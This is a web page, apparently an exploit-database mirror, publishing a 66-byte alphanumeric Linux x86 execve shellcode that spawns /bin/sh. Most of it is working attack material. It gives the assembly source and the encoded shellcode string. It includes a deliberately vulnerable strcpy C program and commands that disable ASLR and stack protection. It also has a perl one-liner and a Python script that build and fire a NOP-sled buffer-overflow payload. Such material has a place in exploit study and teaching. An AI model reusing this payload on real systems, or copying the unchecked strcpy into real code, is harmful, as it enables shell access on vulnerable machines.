Registerlinuxx86 execve() alphanumeric shellcode (66 bytes)
▸▸▸ Exploit & Vulnerability >> shellcode exploit & linux_x86 vulnerability
Online Vulnerability Scanner Tools
Code...
# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) # Date: 2019-12-31 # Shellcode Author: bolonobolo # Tested on: Linux x86 ######################## execve.asm ############################### global _start section .text _start: ; int 0x80 ------------ push 0x30 pop eax xor al, 0x30 push eax pop edx dec eax xor ax, 0x4f73 xor ax, 0x3041 push eax push edx pop eax ;---------------------- push edx push 0x68735858 pop eax xor ax, 0x7777 push eax push 0x30 pop eax xor al, 0x30 xor eax, 0x6e696230 dec eax push eax ; pushad/popad to place /bin/sh in EBX register push esp pop eax push edx push ecx push ebx push eax push esp push ebp push esi push edi popad push eax pop ecx push ebx xor al, 0x4a xor al, 0x41 ######################## ASCII string ########################## j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A ########################## bof.c #################### #include <stdlib.h> #include <stdio.h> #include <string.h> int main(int argc, char *argv[]){ char buffer[128]; strcpy(buffer, argv[1]); return 0; } When you test it on new kernels remember to disable the randomize_va_space and to compile the C program with execstack enabled and the stack protector disabled # bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf' # sysctl -p # gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g bof.c -o bof ################################################################### ./bof `perl -e 'print "\x90"x48 . "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" . "D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'` The \x79\xf7\xff\xbf may change, you must find yourself an address in the NOP befor the shellcode #################### alpha.py ############################ #!/usr/bin/python import os print "[*] Loading NOP" z = "\x90"*48 print "[*] Loading alphanumeric" z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" print "[*] Loading syscall" z += "D"*16 print "[*] Loading JMP and landing address" z += "\xff\xe4\x79\xf7\xff\xbf" print "[*] Popping the shell..." os.system("./bof " + z) ##################################################################
Linuxx86 execve() alphanumeric shellcode (66 bytes) Vulnerability / Exploit Source : Linuxx86 execve() alphanumeric shellcode (66 bytes)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes